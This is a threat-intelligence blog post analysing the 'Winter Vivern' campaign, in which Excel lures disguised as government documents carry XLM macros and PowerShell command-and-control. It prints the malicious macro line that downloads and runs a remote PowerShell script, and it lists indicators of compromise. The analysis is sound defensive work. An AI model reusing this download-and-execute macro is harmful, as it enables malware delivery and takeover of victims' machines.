Winter Vivern: A Look At Re-Crafted Government MalDocs - DomainTools | Start Here. Know Now. Products Products Iris Intelligence Platform The first place to go when you need to know. Iris Investigate Map connected infrastructure to get ahead of threats. Iris Detect Discover and monitor lookalike domains with unmatched speed and coverage. Iris Enrich Integrate DomainTools data with SIEM, SOAR, and other tools. Farsight DNSDB The world’s largest Passive DNS intelligence solution. DNSDB API Unlock the power of 13+ years of historical passive DNS data, updated in real time. DNSDB Export The “on-premise” version of DNSDB API resulting in the fastest response time, unlimited query volume, and total query privacy. DNSDB Flexible Search Regular expression search across every label of a fully qualified domain name and select RData. Threat Intelligence Feeds If it’s happening online, you’ll know. Domain Visibility Daily risk-scored domain list and targeted feeds. Predictive Risk Score Predictive risk scoring and infrastructure profiling. Integrations Integrations SIEM Enhance threat hunting and domain alerts in your preferred SIEM. SOAR Create event playbooks and take targeted action with our leading domain intelligence. Threat Intelligence Uncover actor infrastructure and profile threats in your preferred platform. Getting Started Transform threat data into intelligence with top security vendor partnerships. Partners Partners Reseller Partner VAR’s, Distributors, MSSP’s and System Integrators can 
grow revenue and improve margins. OEM Partners Cyber Product and Service companies can quickly advance and differentiate your solution. Technology Partners Cyber Technology Companies enhance and expand 
your capabilities. Solutions Solutions By Use Case Threat Intelligence See the Internet. Identify risk. Phishing and Fraud Prevention Gain the early upper hand on emerging campaigns. Threat Hunting Make unknown threats known before they do damage. Brand Protection Defend your brand and reputation. Forensics & Incident Response Discover “who is” behind attacks and threats. Application Enrichment Build homegrown or third-party security applications with the world’s best Internet intelligence. By Industry Federal Government Strengthening cybersecurity resilience across government systems. Financial Services Increasing the financial sector’s resilience against attacks. Healthcare Bolstering protection and defenses for PII and PHI. Technology Helping defenders of the high-tech attack surface. Retail Safeguarding against data breaches, consumer-based attacks, phishing, BEC, and other threats. Company Company Leadership Meet our exceptional executive team of experts and industry leaders. Careers Join our team to collaborate with exceptional people who are dedicated to protecting the Internet. Pressroom Access the latest DomainTools news and press coverage. Contact We’re here to help with product info, pricing, and current and future account services. Resource Center Resource Center Knowledge Center Blog Explore our library of thought leadership articles and insights. Webinars Watch live and on-demand cybersecurity training from the DomainTools team. Podcasts Stream informative and exclusive episodes of DomainTools “Breaking Badness” podcast. White Papers Discover the real-world impact of DomainTools DNS intelligence. Client Resources User Guides Navigate DomainTools features effortlessly with our comprehensive guides. API Documentation Access everything you need, including endpoint, response formats, sample queries, and product service levels. Customer FAQs Explore our in-depth Frequently Asked Questions by category to get the answers you need. Featured Blog Proactive Defense with DomainTools Real-Time Feeds Read More - Support and Learning - Request a Demo Products Products Iris Intelligence Platform The first place to go when you need to know. Iris Investigate Map connected infrastructure to get ahead of threats. Iris Detect Discover and monitor lookalike domains with unmatched speed and coverage. Iris Enrich Integrate DomainTools data with SIEM, SOAR, and other tools. Farsight DNSDB The world’s largest Passive DNS intelligence solution. DNSDB API Unlock the power of 13+ years of historical passive DNS data, updated in real time. DNSDB Export The “on-premise” version of DNSDB API resulting in the fastest response time, unlimited query volume, and total query privacy. DNSDB Flexible Search Regular expression search across every label of a fully qualified domain name and select RData. Threat Intelligence Feeds If it’s happening online, you’ll know. Domain Visibility Daily risk-scored domain list and targeted feeds. Predictive Risk Score Predictive risk scoring and infrastructure profiling. Integrations Integrations SIEM Enhance threat hunting and domain alerts in your preferred SIEM. SOAR Create event playbooks and take targeted action with our leading domain intelligence. Threat Intelligence Uncover actor infrastructure and profile threats in your preferred platform. Getting Started Transform threat data into intelligence with top security vendor partnerships. Partners Partners Reseller Partner VAR’s, Distributors, MSSP’s and System Integrators can 
grow revenue and improve margins. OEM Partners Cyber Product and Service companies can quickly advance and differentiate your solution. Technology Partners Cyber Technology Companies enhance and expand 
your capabilities. Solutions Solutions By Use Case Threat Intelligence See the Internet. Identify risk. Phishing and Fraud Prevention Gain the early upper hand on emerging campaigns. Threat Hunting Make unknown threats known before they do damage. Brand Protection Defend your brand and reputation. Forensics & Incident Response Discover “who is” behind attacks and threats. Application Enrichment Build homegrown or third-party security applications with the world’s best Internet intelligence. By Industry Federal Government Strengthening cybersecurity resilience across government systems. Financial Services Increasing the financial sector’s resilience against attacks. Healthcare Bolstering protection and defenses for PII and PHI. Technology Helping defenders of the high-tech attack surface. Retail Safeguarding against data breaches, consumer-based attacks, phishing, BEC, and other threats. Company Company Leadership Meet our exceptional executive team of experts and industry leaders. Careers Join our team to collaborate with exceptional people who are dedicated to protecting the Internet. Pressroom Access the latest DomainTools news and press coverage. Contact We’re here to help with product info, pricing, and current and future account services. Resource Center Resource Center Knowledge Center Blog Explore our library of thought leadership articles and insights. Webinars Watch live and on-demand cybersecurity training from the DomainTools team. Podcasts Stream informative and exclusive episodes of DomainTools “Breaking Badness” podcast. White Papers Discover the real-world impact of DomainTools DNS intelligence. Client Resources User Guides Navigate DomainTools features effortlessly with our comprehensive guides. API Documentation Access everything you need, including endpoint, response formats, sample queries, and product service levels. Customer FAQs Explore our in-depth Frequently Asked Questions by category to get the answers you need. Featured Blog Proactive Defense with DomainTools Real-Time Feeds Read More - Support and Learning - Request a Demo Blog DomainTools Research Federal Government Winter Vivern: A Look At Re-Crafted Government MalDocs Targeting Multiple Languages 04/27/2021 Share this entry Share on Facebook Share on Twitter Share on Linkedin Share by Mail Chad Anderson @piffey Executive Summary While parsing Microsoft Excel documents using XLM 4.0 macros, the DomainTools Research team came across a Lithuanian-language document title innocuously named “contacts”. The simple macro in this document dropped a slightly more complex PowerShell script that performed C2 communications with a domain that has been active since December 2020 and appeared on no industry-standard blocklists. The most recent domain serving documents was registered in April 2021 and DomainTools Research believes other domains used as short term distribution may lead to other documents. The macro and domain mentioned, when hunted on, revealed documents targeting Azerbaijan, Cyprus, India, Italy, Lithuania, Ukraine, and the Vatican. The DomainTools Research team colloquially refers to this as “Winter Vivern” due to the path used in C2 communication over the last several months. Context For Defenders XLM 4.0 macros, the precursor to VBA in Microsoft Office documents, continue to be a problem as malware authors leverage them to avoid detection. Many times, well crafted macros that span multiple cells and use obfuscation can be used to obscure adversary infrastructure from virus scanners and other tools. While tooling has come a long way in the last few years that XLM macros have been en vogue, the DomainTools Research team continues to hunt for new and novel ways that attackers hide domains in these documents. We suggest anyone looking into a document containing XLM macros take a look at the excellent XLMMacroDeobfuscator tool to assist in parsing. However, do be aware that there is currently a bug that breaks deobfuscation when multiple macros are in a single cell . This was the bug the DomainTools Research team was trying to solve while hunting for documents that failed in this way. As luck would have it the project maintainer already has a fix in a testing branch if you as a defender come across this problem in documents you are analyzing. The Malicious Document The initial Lithuanian-language document, titled vtas_kontaktai_2021_04_20.xls , contains the typical request to enable content if the document is not functioning properly. The document says it contains the “Contact Details of Municipal Administrations Departments for the Protection of the Rights of the Child”. This is a document which the official government of Lithuania provides and can be found on Google as seen below. However, the modified version includes a malicious XLM 4.0 macro that calls out to the domain secure-daddy[.]com. This initial piece follows on all subsequent documents mentioned later in this writing as well. CALL("kernel32","WinExec","JCJ","powershell  -c ""iex (New-Object Net.Webclient).DownloadString( 'https://secure-daddy[.]com/wintervivern/server/serverHttpRequest(RUN).txt')""",0) When executing that string, another PowerShell script is pulled down and run which pulls down one of two scheduled task files depending on the Microsoft Windows version it has infected. These scheduled tasks regularly run the above pull from secure-daddy[.]com so that the script can keep itself updated. The script contains a simple push with all system information up to the C2, then checks at regular intervals for new commands, presumably capable of dropping another payload. Additional Targeting Examining the origin of the document on VirusTotal we can see that the initial document comes from the URL: https://securemanag[.]com/data/public/uploads/2017/08/vtas_kontaktai_2021_04_20.xls This URL also servers up the Azerbaijani-language application-for-visas.xls and a generic Peace Institutions contact document in English. All documents contain the PowerShell script mentioned above. When hunting for anything calling out to the secure-daddy[.]com domain we found the Italian-language Rassegna Documentazioni Dicastero per la Comunicazione.xls (first seen 2021-03-07) and the Cyprus-language document Ενημερωμένος κατάλογος.xls (first seen 2021-04-21) which is another set of contact-themed documents. All documents so far have had an author of “Admin” and contained a Cyrillic code page. Since December 2020, secure-daddy[.]com has also been involved in distributing documents from two URLs that would suggest earlier targeting of the Indian government and the Vatican: https://secure-daddy[.]com/mail.gov.in/iwc_static/c11n/allDomain/Documents/mealib/List%20of%20online%20databases.xls

https://secure-daddy[.]com/www.sdsofficium.va/portale/portalesdsext.nsf/ Attacker Infrastructure Examining the attacker infrastructure, we found that neither domain was on an industry-standard blocklist, but that DomainTools predictive Risk Scoring algorithms did properly rate them as the highest possible risk for malware. While the initial C2 domain secure-daddy[.]com was registered in December 2020, the serving domain securemanag[.]com has only been active since April 2021. This indicates to us that the adversary is likely starting a new campaign, serving documents from this address and hiding their C2 behind infrastructure they’re reusing from before. Both domains are hosted on 3NT Solutions LLP, but are split between the older domain in Sweden and the latest in Estonia. Examining passive DNS we can see that there has been a decent run of activity on the C2 domain so presumably some of these documents have worked and more are out in the wild. Additionally, the SPF record indicates that it accepts mail from a wide range of servers and is set up (per the SPF record with ~all) to send mail in transition. The newer, document-serving domain has a similar setup but only contains the hostinger[.]com portion in its SPF record. However, what is more interesting is that the IP address behind this domain was previously hosting centr-security[.]com. When searched for in VirusTotal this reveals another document served up targeting Ukrainian-language speakers from the URL https://centr-security[.]com/mil.gov.ua/documents/stat/statistics-donbas-07042021.xls. It’s important to note that centr-security[.]com has already been placed on a blocklist, but that this domain is spoofing the Council of European National Top-Level Domain Registrars (CENTR). Conclusion This campaign has seemed to have run largely undetected since around December 2020 with a wide range of targets and languages. As the scripts are unobfuscated and quite simple, we don’t see this being a complex APT-level campaign as it doesn’t leverage any known tooling. However, we feel it’s always important to note that sophistication is not a requirement to success. Since this cluster of documents can’t be tied to any other campaign, attribution is difficult at this time and DomainTools Research is monitoring this as an independent cluster. IoCs File Hashes File Name Hash Ενημερωμένος κατάλογος.xls 94f45ba55420961451afd1b70657375ec64b7697a515a37842478a5009694cfa Ενημερωμένος κατάλογος_NS.xls 2a176721b35543d7f4d9e3d24a7c50e0ea57d7eaa251c6b24985d5266a6a977a vtas_kontaktai_2021_04_20.xls f84044bddbd3e05fac1319c988919492971553bb65dbf7b7988d66a8cd677eb8 application-for-visa.xls bd1efa4cf3f02cd8723c48deb5f69a432c22f359b93cab4f1d2a9f037a236eaa DB%20-%20Peace%20Institutions%20(draft).xls 00f6291012646213a5aab81153490bb121bbf9c64bb62eb4ce582c3af88bccfd Rassegna Documentazioni Dicastero per la Comunicazione.xls 638bedcc00c1b1b8a25026b34c29cecc76c050aef56fa55f6e8878e6b951e473 serverHttpRequest(RUN).txt c34e98a31246f0903d4742dcf0a9890d5328ba8a1897fcf9cd803e104591ed5f Domains centr-security[.]com

secure-daddy[.]com

securemanage[.]com IP Addresses 37[.]252[.]9[.]123

37[.]252[.]5[.]133 Iris Investigate Hash U2FsdGVkX1+/QFMAzMGoRJL1g99F/qbks7NwRHYLPXkMcCCMO1whT0jHrV5fHxs8ZVy3Cc2kvVawfePzqppMhHBvCquXS2sz1JKAw2lAbjSl+B7HbHYU7TOK7MWpiXq+WKx2n0C8DWcoRWxZZBtN/wIIdpWfTt5I8j1WJRd07KTMddZaS+xKsm8U51C+Rq8MxabinBbb0ZnnqRXQTIdwRDE1mNiS9GhS6I8/scMTqVgNy5LjDKtIS43+i0YlsjcAjHPAjv0zv7mfaiGbO08V95Wewf7CZBZM3njl5ADVPJet4qZ28yfT52cDfqDRiPFVhocE5u3qeMpc3sVQBFWCDVvOo99HHsnLumbOkt3lJlEhO8CsPyJ4qaKsnKYG2vFG6b+C14hVzMDHcAsXI35HikbLj80O5xdVnDlx7ydf0yKcCLn6s0ru+OIMf2RlsjLIxo2sIjnBveWos9wNUcgXMf2UOWvP4XPkLXvUdSYaJCETtmzE1KfxpasB8IxzSiZaMTUg4COEsWG+jhUKI6Z+4y9ICC7cDIktsXSFzhpac30gYK3crye0ft3yw+oR+ydV Sign up for our newsletter Sign Up Related Content Blog Proactive Defense with DomainTools Real-Time Feeds Read more Blog DNSDB Scout Updates: Streamlined Interoperability with Iris Investigate Read more Blog Why Your Protective DNS Needs Real-Time Data: The DomainTools Advantage Read more Pricing Contact Login Support Request a Demo Solutions Use Cases Threat Intelligence Phishing and Fraud Prevention Threat Hunting Brand Protection Forensics & Incident Response Application Enrichment Industries Federal Government Financial Services Healthcare Technology Retail Products Iris Platform Iris Detect Iris Enrich Iris Investigate Farsight DNSDB Threat Intelligence Feeds Predictive Risk Scoring Hosting IP Risk Feed & Hotlist Domain Risk Feed & Hotlist Domain Visibility Feed Domain Discovery Feed Farsight Newly Active Domains Farsight Newly Observed Hostnames Farsight Newly Observed Domains DomainTools Monitors Integrations SIEM SOAR Threat Intelligence Anomali Cortex XSOAR CrowdStrike Elastic IBM QRadar IBM Resilient Maltego MISP Splunk Splunk SOAR TheHive and Cortex Partners Reseller Partner Technology Partners MSSP Partners OEM Partners Partner Portal Company Leadership Careers Pressroom Resources Resource Center API Documentation Events Support and Learning Link to Rss  this site Link to Facebook Link to Twitter Link to Linkedin © 2025 DomainTools DomainTools® and DomainTools™ are owned by DomainTools, all rights reserved. Privacy Policy | California Privacy Notice Do Not Sell My Personal Information | Terms of Service | Sitemap